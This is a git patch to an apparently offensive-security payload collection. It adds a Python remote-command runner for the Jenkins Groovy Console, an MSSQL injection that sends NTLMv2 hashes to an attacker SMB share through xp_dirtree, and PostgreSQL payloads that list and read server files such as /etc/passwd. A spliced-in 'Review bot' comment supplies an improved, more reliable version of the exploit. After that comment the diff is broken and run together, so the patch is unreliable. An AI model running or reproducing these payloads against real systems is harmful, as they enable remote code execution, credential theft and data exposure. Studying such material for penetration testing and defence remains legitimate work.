From 78c882fb3458531de6f2c78807d736ac192b1b00 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sun, 17 Feb 2019 20:02:16 +0100
Subject: [PATCH] Jenkins Grrovy + MSSQL UNC + PostgreSQL list files
---
CVE Exploits/Jenkins Groovy Console.py | 30 +++++++++++++++++++
.../Active Directory Attack.md | 5 ++++
SQL injection/MSSQL Injection.md | 8 +++++
SQL injection/PostgreSQL Injection.md | 3 ++
4 files changed, 46 insertions(+)
create mode 100644 CVE Exploits/Jenkins Groovy Console.py
diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py
new file mode 100644
index 0000000..10bc080
--- /dev/null
+++ b/CVE Exploits/Jenkins Groovy Console.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
+# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
+import requests
+import sys
+
+print """
+Jenkins Groovy Console cmd runner.
+
+usage: ./jgc.py [HOST]
+
+Then type any command and wait for STDOUT output from remote machine.
+Type 'exit' to exit :)
+"""
+URL = sys.argv[1] + '/scriptText'
+HEADERS = {
+ 'User-Agent': 'jgc'
+}
+
+while 1:
+ CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
+ if CMD == 'exit':
+ print "exiting...\n"
+ exit(0)
+
+ DATA = {
+ 'script': 'println "{}".execute().text'.format(CMD)
+ }
+ result = requests.post(URL, headers=HEADERS, data=DATA)
+ print result.text
\ No newline at end of file
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index af8f813..f29af93 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
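Review bot: The `'script'` value splices the operator's command straight into a Groovy double-quoted GString, so a command containing `"`, `\` or `$` either breaks the script or gets interpolated server-side, and `String.execute()` tokenizes on whitespace with no shell, so pipes, redirects and quoted arguments silently do nothing. Building the payload from an escaped single-quoted Groovy literal passed as a shell argv fixes both and lets stderr come back as well (on a Windows controller `["cmd", "/c", ...]` would be needed instead of `/bin/sh`). Independently, `requests.post` has no `timeout`, `sys.argv[1]` is read before any argc check, and `result.text` is printed without looking at the status, so against an authenticated Jenkins — where `/scriptText` typically requires script permission plus a crumb or API token — the tool just dumps a 403 login page and offers no `auth=` option at all. The file is also Python 2 only (`print` statement, `raw_input`) and lacks a trailing newline.
```python
def groovy_literal(s):
    # Single-quoted Groovy string: no $-interpolation; escape backslash and quote.
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

# ... unchanged: banner, URL/HEADERS, exit handling ...
    DATA = {
        'script': ('def p = ["/bin/sh", "-c", {}].execute(); '
                   'def out = new StringBuffer(), err = new StringBuffer(); '
                   'p.waitForProcessOutput(out, err); println out; println err'
                   ).format(groovy_literal(CMD))
    }
    result = requests.post(URL, headers=HEADERS, data=DATA, timeout=30)
    if result.status_code != 200:
        print "HTTP %d from /scriptText (credentials or CSRF crumb required?)" % result.status_code
    print result.text
```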
@@ -68,6 +68,11 @@ ``` * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) +* [Ping Castle](https://github.com/vletoux/pingcastle) + + ```powershell + pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession + ``` ## Most common paths to AD compromise diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index 9510870..0061bad 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +## MSSQL UNC Path + +MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. + +```sql +1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- +``` + ## MSSQL Make user DBA (DB admin) ```sql diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index c92b4ae..8eddd8a 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ## PostgreSQL File Read ```sql +select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` +NOTE: ``pg_read_file` doesn't accept the `/` character. + ```sql CREATE TABLE temp(t TEXT); COPY temp FROM '/etc/passwd';